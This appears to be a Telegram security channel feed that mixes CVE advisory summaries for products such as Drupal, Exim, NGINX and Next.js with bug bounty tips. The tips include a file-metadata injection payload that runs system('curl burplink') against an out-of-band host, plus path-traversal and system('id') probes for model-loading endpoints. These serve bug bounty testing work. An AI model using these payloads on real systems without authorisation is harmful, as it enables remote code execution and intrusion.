CVE

🔐 CVE | Cyber Vulnerabilities Exchange
Group dedicated to sharing and discussing CVEs, zero-days, critical vulnerabilities, exploits, PoCs, and technical analyses of offensive and defensive security.
🟢 Think. Break. Secure.
BY: @Mm_fit #cve

4 019 subscribers
Channel posts
CVE-2026-5118 The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled 'role' parameter from POST data during user registration without validating it against the form's configured defaultuserrole setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration.

Hey Hunters, DarkShadow is here back again!

🖥 100 Web Vulnerabilities, categorized into various types: 😀

⚡ Injection Vulnerabilities:
1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)

⚡ Broken Authentication and Session Management:
14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse

⚡ Sensitive Data Exposure:
22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling

⚡ Security Misconfiguration:
28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration

⚡ XML-Related Vulnerabilities:
37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb

⚡ Broken Access Control:
40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control

⚡ Insecure Deserialization:
45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection

⚡ API Security Issues:
48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation

⚡ Insecure Communication:
52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols

⚡ Client-Side Vulnerabilities:
56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues

⚡ Denial of Service (DoS):
61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service

⚡ Other Web Vulnerabilities:
66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse

⚡ Mobile Web Vulnerabilities:
76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering

⚡ IoT Web Vulnerabilities:
80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities

⚡ Web of Things (WoT) Vulnerabilities:
83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues

⚡ Authentication Bypass:
85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass

⚡ Server-Side Request Forgery (SSRF):
87. Blind SSRF
88. Time-Based Blind SSRF

⚡ Content Spoofing:
89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass

⚡ Business Logic Flaws:
92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws

⚡ Zero-Day Vulnerabilities:
98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits

Let me know if there is any vulnerability I missed?!
CVE-2026-9082 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Drupal Drupal core allows SQL Injection. This issue affects Drupal core: from 8.9.0 before 10.4.10, from 10.5.0 before 10.5.10, from 10.6.0 before 10.6.9, from 11.0.0 before 11.1.10, from 11.2.0 before 11.2.12, from 11.3.0 before 11.3.10.
CVE-2026-41651 PackageKit is a D-Bus abstraction layer that allows the user to manage packages in a secure way using a cross-distro, cross-architecture API. PackageKit between and including versions 1.0.2 and 1.3.4 is vulnerable to a time-of-check time-of-use (TOCTOU) race condition on transaction flags that allows unprivileged users to install packages as root and thus leads to a local privilege escalation. This is patched in version 1.3.5. A local unprivileged user can install arbitrary RPM packages as root, including executing RPM scriptlets, without authentication. The vulnerability is a TOCTOU race condition on transaction->cached_transaction_flags combined with a silent state-machine guard that discards illegal backward transitions while leaving corrupted flags in place. Three bugs exist in src/pk-transaction.c: 1. Unconditional flag overwrite (line 4036..
CVE-2026-46300
CVE-2026-45185 Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.
CVE-2026-33824 Double free in Windows IKE Extension allows an unauthorized attacker to execute code over a network.
Hacking a Bug Bounty Platform: JWT Forgery, SSTI & Python Import Hijacking to Root
In this video, we exploit an exposed Git repository, forge JWT tokens, abuse SSTI for code execution, and leverage hijacking to gain root ...
https://youtu.be/4BzZS4ualn0
CVE-2025-59536 Claude Code is an agentic coding tool. Versions before 1.0.111 were vulnerable to Code Injection due to a bug in the startup trust dialog implementation. Claude Code could be tricked to execute code contained in a project before the user accepted the startup trust dialog. Exploiting this requires a user to start Claude Code in an untrusted directory. Users on standard Claude Code auto-update will have received this fix automatically. Users performing manual updates are advised to update to the latest version. This issue is fixed in version 1.0.111.
Hey Hunters, DarkShadow is here back again!
File upload extension bypass for RCE ❌
Metadata injection for RCE ✅
File upload vulnerability is not just bypassing the extension, metadata can be exploited. You can try like: {"Title\n-if\nsystem('curl burplink)||1\n-Comment":"x"}
Guys, if you really love to read then show your love and react ❤️ and don't forget to follow me x.com/darkshadow2bd
#bugbounty #bugbountytips #rce
CVE-2026-42945 NGINX Plus and NGINX Open Source have a vulnerability in the ngx_http_rewrite_module module. This vulnerability exists when the rewrite directive is followed by a rewrite, if, or set directive and an unnamed Perl-Compatible Regular Expression (PCRE) capture (for example, $1, $2) with a replacement string that includes a question mark (?). An unauthenticated attacker along with conditions beyond its control can exploit this vulnerability by sending crafted HTTP requests. This may cause a heap buffer overflow in the NGINX worker process leading to a restart. Additionally, for systems with Address Space Layout Randomization (ASLR) disabled, code execution is possible. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.
CVE-2025-70849 Arbitrary File Upload in podinfo thru 6.9.0 allows unauthenticated attackers to upload arbitrary files via crafted POST request to the /store endpoint. The application renders uploaded content without a restrictive Content-Security-Policy (CSP) or adequate Content-Type validation, leading to Stored Cross-Site Scripting (XSS).
New Video: Built a real AI-powered Bug Bounty Agent from scratch using Claude Code, Kali Linux & modern recon tooling 🚀 Automated recon, XSS/SQLi workflows, custom CLAUDE.md system, attack surface mapping & AI-assisted vulnerability hunting. 🎥 https://youtu.be/HRvw79AVoWI
CVE-2026-44578 Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.
Hey Hunters, DarkShadow is here back again!
Blind RCE in load model 💀
If you see any endpoint which loads a model/function from client side, try:
1) you can find ../../ LFI easily
2) system('id'); php functions for code injection
3) \"exec\" try blind rce using your burpcollab
Guys, you can join my new YouTube channel. I'll upload regular videos here. YouTube.com/@darkshadow2bd
#rce #bugbounty #bugbountytips
CVE-2026-23918 Double Free and possible RCE vulnerability in Apache HTTP Server with the HTTP/2 protocol. This issue affects Apache HTTP Server: 2.4.66. Users are recommended to upgrade to version 2.4.67, which fixes the issue.